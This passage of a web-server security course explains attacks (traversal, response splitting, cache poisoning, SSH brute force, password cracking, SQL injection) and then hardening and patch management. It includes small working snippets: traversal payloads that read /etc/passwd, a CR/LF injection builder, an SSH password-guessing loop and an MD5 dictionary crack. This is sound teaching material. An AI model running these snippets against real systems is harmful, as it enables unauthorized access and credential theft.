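Grabbing those banners is as simple as sending a request and reading the response headers. A minimal sketch with the Python standard library, using 'example.com' as a placeholder for a host you are authorized to test:

import http.client

# Open a connection and ask only for the headers of the home page
conn = http.client.HTTPConnection("example.com", 80, timeout=5)
conn.request("HEAD", "/")
resp = conn.getresponse()

print("Server:", resp.getheader("Server"))              # e.g. Apache/2.4.29 (Ubuntu)
print("X-Powered-By:", resp.getheader("X-Powered-By"))  # e.g. PHP/7.2.3, if exposed
conn.close()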

Directory traversal attacks

Web servers are designed so that public access is limited to a specific part of the filesystem. Directory traversal is an HTTP exploit through which attackers can access restricted directories and execute commands outside the web server's root directory by manipulating a URL. Attackers can use trial and error to navigate outside the root directory and access sensitive information on the system, or even execute shell commands on the server's operating system.
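The probe itself is usually automated. Below is a minimal sketch, only for lab systems you are authorized to test; the base URL, the 'file' parameter and the payloads are assumptions for the example, and it uses the 'requests' library.

import requests

base = "http://lab.example.com/download?file="
payloads = ["../../../../etc/passwd", "..%2f..%2f..%2f..%2fetc%2fpasswd"]

for payload in payloads:
    r = requests.get(base + payload, timeout=5)
    # If the body contains "root:", the traversal probably reached /etc/passwd
    print(payload, r.status_code, "root:" in r.text)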

HTTP response split attack


An HTTP response splitting attack is a web-based attack in which the server is tricked by injecting new lines (CR/LF) into the response headers along with arbitrary content. It is often combined with attacks such as Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) and SQL injection. The attacker crafts a single request so that the web server processes it as two requests and responds to each of them; this is achieved by adding response header data through an input field. The attacker passes malicious data to a vulnerable application so that the first response redirects the user to a malicious website, while the remaining responses are discarded by the web browser.

 Normal request and response: a normal web application exposes a 'lang' parameter with which the website's language can be configured.
 Request injected by an attacker, and vulnerable response: taking advantage of the lang parameter, the attacker injects data from the previous response in order to manipulate the server's response and return HTML content created by the attacker.
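The key ingredient is a CR/LF sequence (%0d%0a once URL-encoded) smuggled into a value that the application echoes into a response header. A hedged illustration of how such a payload is built, assuming a hypothetical vulnerable URL and the 'lang' parameter described above:

from urllib.parse import quote

# CR/LF ends the legitimate header; everything after it becomes
# attacker-controlled headers and a second, forged response body.
payload = ("en\r\nContent-Length: 0\r\n\r\n"
           "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
           "<html>content written by the attacker</html>")

print("http://vulnerable.example.com/page?lang=" + quote(payload))

Most modern servers and frameworks strip or reject CR/LF in header values precisely to block this class of attack.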

Web cache poisoning attack


Web cache poisoning is an attack against the reliability of an intermediate web cache, in which the legitimate content cached for a given URL is replaced with infected content. Users of that web cache can unknowingly receive the poisoned content instead of the true and secure content when they request that URL through the cache.

The attacker forces the web server's cache to discard its actual contents and then sends a specially crafted request whose response ends up stored in the cache.

HTTP response hijacking


HTTP response hijacking builds on a response splitting request. In this attack, the attacker first sends a response-splitting request to the web server; the server divides the response in two and sends the first response to the attacker and the second to the victim. On receiving the response from the web server, the victim requests the service by supplying credentials. At the same time, the attacker requests the index page, so the web server delivers the response to the victim's request to the attacker, while the victim remains unaware.

Brute force against SSH

The SSH protocol is used to create an encrypted tunnel between two hosts so that otherwise unencrypted data can travel across an insecure network. To attack SSH, the attacker first scans the SSH server to identify possible weaknesses, then uses a brute force attack to obtain login credentials. Once the attacker has valid SSH credentials, they can use the same SSH tunnels to deliver malware and other exploits to victims without being detected.
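A heavily simplified sketch of such a dictionary attack, intended only for machines you own or are explicitly authorized to test. It assumes the third-party 'paramiko' library is installed; the host, user and candidate passwords are placeholders.

import paramiko

host, user = "192.168.56.10", "root"
wordlist = ["123456", "toor", "admin"]

for password in wordlist:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, username=user, password=password, timeout=5)
        print("Valid credentials found:", user, password)
        break
    except paramiko.AuthenticationException:
        pass  # wrong password, try the next candidate
    finally:
        client.close()

Countermeasures such as fail2ban, rate limiting and key-based authentication make exactly this kind of loop impractical.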

Attack: Man in the middle


A man-in-the-middle attack is a method in which an intruder intercepts or modifies the messages exchanged between the user and the web server by eavesdropping on, or breaking into, the connection. This allows the attacker to steal the user's confidential information, such as online banking details, usernames and passwords, as it travels over the Internet to the web server. The attacker lures the victim into connecting through them by posing as a proxy; if the victim trusts and accepts the attacker's request, all communication between the user and the web server passes through the attacker, who can then steal the user's sensitive information.

Password cracking
Many computer criminals start simply by cracking passwords: once a password is cracked, the attacker can log on to the network as an authorized user. Attackers use different methods to obtain passwords, such as social engineering, identity theft, phishing, trojans or viruses, wiretapping, keylogging, brute-force attacks, dictionary attacks, etc.

Attackers mainly target:

 Authentication in web forms
 SSH access
 FTP servers
 SMTP servers
 Shared servers

Web server password cracking techniques

Passwords can be cracked manually or with automated tools such as Cain & Abel, Brutus, THC Hydra, etc. Attackers use several techniques to crack passwords:

 Guessing: a common cracking method is to guess passwords, either manually or with automated tools fed with dictionaries. Most people tend to use the names of their pets, license plate numbers, dates of birth or other weak passwords such as "password" or "administrator" so that they can remember them easily; that same habit is what allows the attacker to guess them.
 Dictionary attack: a dictionary attack tries predefined words in various combinations. It may not be effective if the password contains special characters and symbols, but compared with a brute-force attack it takes less time.
 Brute force attack: in the brute force method, every possible combination of characters is tried, for example capitals from "A to Z", numbers from "0 to 9" and lowercase letters from "a to z". This works for short or simple passwords, but if a password mixes uppercase and lowercase letters and special characters, cracking it can take months or years, which is practically impossible.
 Hybrid attack: a hybrid attack is more powerful because it combines a dictionary attack with brute force, appending symbols and numbers to dictionary words. Cracking passwords becomes easier with this method.
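When the attacker has obtained a password hash rather than a login prompt, the dictionary attack is run offline against the hash. A minimal sketch with the Python standard library; the MD5 hash below is the well-known hash of the word "password" and is used purely as a lab example.

import hashlib

target_hash = "5f4dcc3b5aa765d61d8327deb882cf99"  # md5("password")
wordlist = ["123456", "qwerty", "password", "admin"]

for candidate in wordlist:
    if hashlib.md5(candidate.encode()).hexdigest() == target_hash:
        print("Password recovered:", candidate)
        break

This is also why storing passwords with fast, unsalted hashes such as MD5 is discouraged; slow, salted algorithms (bcrypt, scrypt, Argon2) make this loop enormously more expensive.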

Attacks against web applications


Vulnerabilities in the web applications running on a web server provide a broad attack surface for compromising the server itself, so if a computer criminal does not want to attack the server directly, they can look for vulnerabilities in the web application that runs on it.

 Directory traversal: an HTTP exploit through which attackers can access restricted directories and execute commands outside the web server's root directory by manipulating a URL.
 Parameter/form tampering: this manipulation attack alters the parameters exchanged between the client and the server in order to modify application data, such as user credentials and permissions, prices and quantities of products, etc.
 Cookie poisoning: the poisoning or alteration of the client's cookie. Most of these attacks happen when the cookie is sent from the client side to the server; both persistent and non-persistent cookies can be modified using different tools.
 Command injection attacks: an attack method in which a hacker identifies form fields that lack proper validation and uses them to inject code, for example HTML, that alters the content of the web page.
 Buffer overflow attacks: most web applications are designed to hold a certain amount of data. If that amount is exceeded, the application may crash or exhibit other vulnerable behavior. The attacker takes advantage of this and floods the application with too much data, causing a buffer overflow.
 Cross-site scripting (XSS): a method in which an attacker injects HTML tags or JavaScript into a target website in order to attack its users or visitors.
 Denial of Service (DoS) attack: an attack designed to stop the operation of a website or server and make it unavailable to its intended users, damaging the availability of the service.
 Unvalidated input and file injection attacks: attacks carried out by supplying unvalidated input that allows files to be injected into a web application. For example, a web form lets users upload a profile picture but the back-end does not validate which files can be uploaded, so the attacker could upload a PDF carrying malware.
 Cross-Site Request Forgery (CSRF): a malicious web page makes the user's browser send requests to a target website, where actions are performed on the user's behalf without their knowledge. This type of attack is especially dangerous on financial websites.
 SQL injection: a code injection technique that exploits a vulnerability in the way an application builds its database queries. The attacker injects malicious code into strings that are then passed to the SQL server for execution. For example, if a search box does not validate what the user enters and the value goes straight into a SQL query, the attacker can type SQL code and read what is inside the database (see the sketch after this list).
 Session hijacking: an attack in which the attacker exploits, steals or predicts a valid web session token in order to access the authenticated parts of a web application.
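To make the SQL injection case concrete, here is a short sketch contrasting a query built by string concatenation (injectable) with a parameterized query, using Python's built-in sqlite3 module; the table, column and sample data are assumptions for the example.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

user_input = "' OR '1'='1"

# Vulnerable: the input becomes part of the SQL statement itself
vulnerable = "SELECT * FROM users WHERE name = '" + user_input + "'"
print(conn.execute(vulnerable).fetchall())           # returns every row

# Safer: the input is passed as a bound parameter, never interpreted as SQL
safe = "SELECT * FROM users WHERE name = ?"
print(conn.execute(safe, (user_input,)).fetchall())  # returns nothing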

Methodology of attack against a Server


As we saw in previous modules of this computer security course, the process for gaining access to or hacking a web server is the same as the one applied to any target system: gather information passively and actively, plan an attack with the information obtained, and finally launch the attack. Below we will look at the steps for performing a security audit aimed at web servers.

I will not go into much depth in each phase, since in the first module of the computer security course we already covered what each step of a security audit involves.

Gather information

Information gathering involves collecting data about the target company: attackers search the Internet, newsgroups, bulletin boards, etc., to obtain information about it, using tools such as Whois, traceroute, Active Whois and similar utilities.

They query Whois databases for details such as a domain name, an IP address or an autonomous system number.

A common starting point for obtaining information about a website is to look for the 'robots.txt' file, usually found in the root of the server (www.example.com/robots.txt). The robots.txt file contains the list of directories and files on the web server that the owner of the website wants to hide from web crawlers (search engines, e.g. Google). The attacker can simply request robots.txt from that URL and retrieve sensitive information, such as the root directory structure, details of the content management system, etc.

In robots.txt the webmaster specifies which folders search engines should ignore; in this case, the attacker could take a particular interest in the '/admin' directory.
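Retrieving the file is trivial to automate. A minimal sketch with the 'requests' library, using a placeholder domain:

import requests

r = requests.get("https://www.example.com/robots.txt", timeout=5)
print(r.status_code)
print(r.text)  # "Disallow:" entries often reveal directories such as /admin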

Get information about services

The purpose of footprinting is to collect account details, the operating system and other software versions, server names, details of the database schema, and as much information as possible about the security posture of the target web server or network. The main objective is to learn its remote access capabilities, open ports and services, and the security mechanisms in place.

Information sought: the server name, the server type, operating systems, running applications, etc. Examples of tools used for footprinting include ID Serve, Netcraft, etc.

This step is usually combined with enumeration: we perform an active scan against the server to obtain specific technical information about it, and Nmap is the ideal tool for this.

Vulnerability scan

Vulnerability analysis is a method for identifying vulnerabilities and misconfigurations in a target web server or network. Vulnerability scanning is done with the help of automated tools known as vulnerability scanners.

Vulnerability scanning reveals which weaknesses exist in the web server and its configuration. To determine whether the web server is exploitable, traffic sniffing and scanning techniques are used to discover active systems, network services, applications and the vulnerabilities present.

In addition, attackers probe the web server infrastructure for any misconfiguration, outdated content and known vulnerabilities. Several tools are used to scan for vulnerabilities, such as Nessus, Nexpose, etc.

Session hijacking

Session hijacking becomes possible once the client's current session is identified: the attacker can take full control of the user's session after the user authenticates with the server. With the help of sequence number prediction tools, attackers hijack the session.

After identifying an open session, the attacker predicts the sequence number of the next packet and sends data packets before the legitimate user can respond with the correct sequence number, thereby hijacking the session. Besides this technique, other session hijacking methods can be used, such as session fixation, session sidejacking, XSS, etc. The most widely used tools for session hijacking are Burp Suite, Hamster and Firesheep.

Countermeasures to protect a Web Server


Now let's look at the countermeasures recommended when putting a server into production, that is, when exposing it to the Internet. Note that these countermeasures are a set of good practices; a computer criminal may still manage to gain access to your server, since computer security is a constantly evolving field, but by following these standard countermeasures we can minimize the damage an attacker could cause. It is therefore vital to take security into account when exposing a server to the Internet. Recommended reading: How to build a secure network, introduction to networks and their security.

Countermeasures: Update and security patches

 Search for existing vulnerabilities, apply patches and update the server software regularly.
 Before applying any service pack, patch or hotfix, read and review all relevant documentation.
 Apply all updates, regardless of their type, as needed.
 Test patches and hotfixes in a representative non-production environment before deploying them to production.
 Ensure that server downtime is scheduled and that a backup is available.
 Have a rollback plan that allows the system and the company to return to the state they were in before a failed deployment.
 Schedule periodic service pack updates as part of maintenance operations.

Countermeasures: Protocols and services

 Block all unnecessary ports and Internet Control Message Protocol (ICMP) traffic.
 Harden the TCP/IP stack and consistently apply the latest software patches and updates to the system software.
 If you use insecure protocols such as Telnet, POP3, SMTP or FTP, take appropriate measures to provide secure authentication and communication, for example by using IPSec policies.
 If remote access is needed, make sure the remote connection is properly secured, using tunneling and encryption protocols.
 Disable WebDAV if the application does not use it, or keep it secured if it is needed.

Countermeasures: User accounts

 Remove all unused modules and application extensions.
 Disable unused default user accounts created during the installation of the operating system or of a service.
 When creating a new web root directory, grant the appropriate NTFS permissions (the least possible).
 Remove unnecessary database users and stored procedures, and follow the principle of least privilege for the database application to defend against SQL injection.
 Slow down brute force and dictionary attacks with strong password policies, and audit and alert on logon failures.
 Run processes under least-privileged accounts, and use least-privileged service and user accounts.

Countermeasures: Files and server directories


 Remove sensitive configuration information embedded in code or bytecode.
 Avoid mapping virtual directories between two different servers, or over a network.
 Monitor and frequently check all network service logs, website access logs, database server logs and operating system logs.
 Disable directory listing.
 Eliminate non-web files, such as archive files, backup copies, text files and header/include files.
 Disable serving of certain file types by creating the appropriate resource mappings.
 Make sure that web application files, website content and scripts live on a partition or drive separate from the operating system, the logs and any other system files.

How to defend against web server attacks

1. Ports

 Audit ports on the server regularly to ensure that an insecure or unnecessary service is not
active on your web server.
 Limit incoming traffic to port 80 for HTTP and port 443 for HTTPS (SSL)
 Encrypt or restrict intranet traffic

2. Server Certificates

 Make sure that the certificate's validity dates are correct and that the certificate is used for its intended purpose.
 Make sure that the certificate has not been revoked and that the certificate's public key chains up to a trusted root authority.

3. Code access security

 Implement secure coding practices.
 Restrict code access security policy settings.

4. Web server

 Avoid revealing directory information when a requested resource is not found.
 Hide the server's technical details (version banners); this way we do not make banner grabbing easy.

Good practices recommended

 Use a dedicated machine as a web server (VPS).
 Create URL mappings to internal servers with caution.
 Track session IDs on the server side and correlate user connections with timestamps, IP addresses, etc.
 If a database server such as MySQL is to be used as the back-end database, install it on a separate server.
 Use the security tools provided with the web server software, and scanners that automate and ease the process of securing a web server.
 Physically protect the web server machine in a secure machine room, or hire a reputable cloud provider (e.g. DigitalOcean).
 Do not connect a web server to the Internet until it is fully hardened.
 Do not allow anyone except the administrator to log in locally on the machine.
 Limit server functionality to the web technologies that will actually be used.
 Monitor and filter the incoming and outgoing traffic of the web server.
 Implement a WAF (Web Application Firewall) to filter the attacks most used by attackers; it is advisable to use a paid version with professional countermeasures.

Patch Management

A patch is a piece of software used to make changes to programs already installed on a computer. Patches are used to correct errors, fix security problems, add functionality, etc. In other words, a patch is a small piece of software designed to fix bugs and security vulnerabilities and to improve the usability or performance of a program or its supporting components; it can be thought of as repair work on a programming problem.

A hotfix is a package that includes one or more files used specifically to address a particular software problem. Hotfixes are used to correct errors in a product; vendors notify users about the latest hotfixes by email, or they can be downloaded from the official website. A hotfix is an update that solves a specific customer problem and is not always distributed outside that customer's organization. Users can receive notifications by email or through the vendor's website. Hotfixes are sometimes packaged together in sets, called combined hotfixes or service packs.

What is Patch Management?

Patch management is the process used to ensure that the appropriate patches are installed on a system, helping to correct known vulnerabilities. That is a good definition of what patch management is; now let's look at how the process works:

1. Detect: it is very important to detect missing security patches promptly, using the appropriate detection tools. Any delay in the detection process raises the chances of a successful malicious attack.
2. Assess: once detection is finished, assess the issues found and the factors associated with them, and plan the strategy that reduces or eliminates the problems most effectively.
3. Acquire: download the patch required to solve the problem.
4. Test: always install the required patch on a test system first, rather than on the main (production) system, since this provides the opportunity to verify the consequences of the update.
5. Deploy: patches must be deployed to the system with the utmost caution, so that the system is not affected by problems introduced by the new patch.
6. Maintain: it is always useful to subscribe to notifications so you learn about newly reported vulnerabilities as they appear.
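The "detect" step is easy to automate on most systems. Below is a hedged sketch for a Debian/Ubuntu host: it calls apt through subprocess and lists packages with pending updates; it assumes apt is available and that the package index has been refreshed recently.

import subprocess

# "apt list --upgradable" prints one line per package that still needs an update
result = subprocess.run(["apt", "list", "--upgradable"],
                        capture_output=True, text=True)

for line in result.stdout.splitlines():
    if "upgradable" in line:
        print(line)  # each line names a package that is missing a patch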

Patch management: recommended tools

 Microsoft Baseline Security Analyzer (MBSA): MBSA identifies missing security updates and common security misconfigurations. It is a tool designed for IT professionals that helps small and medium-sized businesses determine their security state in accordance with Microsoft's security recommendations, and it offers specific remediation guidance. You can improve your security management process by using MBSA to detect common misconfigurations and missing security updates on your computer systems.
 ZENworks Patch Management (Micro Focus)
 Endpoint Security Patch Management (Ivanti)

Pentesting: server hacking

Web server penetration tests begin by gathering as much information as possible about the organization, from its physical location to its operating environment, in order to successfully perform a pentest against the target web server.

 The following are the steps a pentester takes to penetrate the web server:

1. Search open sources for information about the target: try to collect as much information as possible about the target organization's web server, from its physical location to its operating environment. You can obtain this information from the Internet, newsgroups, bulletin boards, etc.
2. Carry out social engineering: use social engineering techniques to gather information such as human resources data, contact details, etc., which can help when testing the web server's authentication. You can also perform social engineering through social networking sites or by dumpster diving.
3. Check Whois databases: use Whois query tools such as Whois, Traceroute, Active Whois, etc., to obtain details about the target, such as the domain name, IP address, administrative contacts, autonomous system number, DNS records, etc.
4. Document all the information about the target: record everything obtained from the various sources.
5. Scan for service information: collect information such as the server name, the server type, operating systems, running applications, etc., using tools like ID Serve, httprecon and Netcraft.
6. Crawl the website: crawl the target website to collect specific information from its pages, such as email addresses. You can use tools like httprint and Metagoofil for this.
7. Enumerate web directories: enumerate the web server's directories to extract important information, such as web functionality, login forms, etc. You can do this with a tool such as DirBuster.
8. Perform a vulnerability scan: scan for vulnerabilities to identify weaknesses in the network, using tools such as Nessus, and determine whether the system can be exploited.
9. Launch the attacks: perform different types of attacks, either manually or with automated tools such as Metasploit, to gain access to the target web server.
10. Document: document the entire process you followed and how you obtained access to the server, and then propose security countermeasures.

This module ends here; I hope you have achieved its learning objectives. This course takes real effort to produce and it is free, so I would appreciate it if you shared it on your social networks or in hacking forums so that more people can see it. The course will keep advancing through several more modules; you can subscribe if you want to follow its progress.
